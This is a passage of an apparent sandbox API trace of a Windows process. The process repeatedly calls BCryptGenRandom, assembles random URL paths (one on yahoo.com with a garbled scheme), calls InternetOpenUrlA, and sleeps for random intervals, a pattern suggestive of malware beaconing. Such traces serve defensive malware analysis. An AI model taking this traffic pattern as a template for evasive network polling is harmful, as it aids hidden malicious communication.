hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.690] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a16fbc, cbBuffer=0x1e, dwFlags=0x2 | out: pbBuffer=0x3a16fbc) returned 0x0 [0273.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.692] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.693] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.694] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.695] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.695] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.696] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.696] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.697] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.697] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.698] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.698] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.698] GetProcessHeap () returned 0x440000 [0273.698] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0273.698] lstrcpyA (in: lpString1=0x472900, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0273.698] lstrcatA (in: lpString1="\x04", lpString2="/y14rcClP1clgAdl3rmcq6572Vrisj8dbhum8rv1Oe/4pHwse2lRkT8uKtg/dofRcqcq81ubbkvyA44guurjM1xhl/" | out: lpString1="\x04/y14rcClP1clgAdl3rmcq6572Vrisj8dbhum8rv1Oe/4pHwse2lRkT8uKtg/dofRcqcq81ubbkvyA44guurjM1xhl/") returned="\x04/y14rcClP1clgAdl3rmcq6572Vrisj8dbhum8rv1Oe/4pHwse2lRkT8uKtg/dofRcqcq81ubbkvyA44guurjM1xhl/" [0273.698] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0273.698] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/y14rcClP1clgAdl3rmcq6572Vrisj8dbhum8rv1Oe/4pHwse2lRkT8uKtg/dofRcqcq81ubbkvyA44guurjM1xhl/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0273.698] GetProcessHeap () returned 0x440000 [0273.698] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0273.698] GetProcessHeap () returned 0x440000 [0273.699] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a16f80 | out: hHeap=0x440000) returned 1 [0273.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0273.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0273.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0273.699] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0273.700] Sleep (dwMilliseconds=0x171ba) [0273.927] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0273.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.928] GetProcessHeap () returned 0x440000 [0273.928] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b720 [0273.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b721, cbBuffer=0x14, dwFlags=0x2 | out: pbBuffer=0x3a1b721) returned 0x0 [0273.928] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.929] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.929] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0273.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.930] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.930] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.931] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.931] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0273.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.932] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b735, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a1b735) returned 0x0 [0273.932] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.933] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.933] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.934] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.934] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.935] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.936] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.937] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.937] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0273.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0273.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0273.938] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.087] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0274.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.088] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.088] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.089] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.089] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0274.089] GetProcessHeap () returned 0x440000 [0274.089] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0274.089] lstrcpyA (in: lpString1=0x4726f0, lpString2="¦·eEs://www.yahoo.com" | out: lpString1="¦·eEs://www.yahoo.com") returned="¦·eEs://www.yahoo.com" [0274.089] lstrcatA (in: lpString1="¦·eEs://www.yahoo.com", lpString2="/2fifs1Uo49H9t7jvcp3/km4bjs2wvkfXq7zecvisy2LVcql0vjvPfa/" | out: lpString1="¦·eEs://www.yahoo.com/2fifs1Uo49H9t7jvcp3/km4bjs2wvkfXq7zecvisy2LVcql0vjvPfa/") returned="¦·eEs://www.yahoo.com/2fifs1Uo49H9t7jvcp3/km4bjs2wvkfXq7zecvisy2LVcql0vjvPfa/" [0274.089] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0274.089] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="¦·eEs://www.yahoo.com/2fifs1Uo49H9t7jvcp3/km4bjs2wvkfXq7zecvisy2LVcql0vjvPfa/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0274.089] GetProcessHeap () returned 0x440000 [0274.089] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0274.089] GetProcessHeap () returned 0x440000 [0274.090] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b720 | out: hHeap=0x440000) returned 1 [0274.090] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0274.090] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0274.090] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.090] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0274.091] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0274.091] Sleep (dwMilliseconds=0x18c56) [0274.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0274.280] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0274.280] BCryptGenRandom (in: hAlgorithm=0x0, 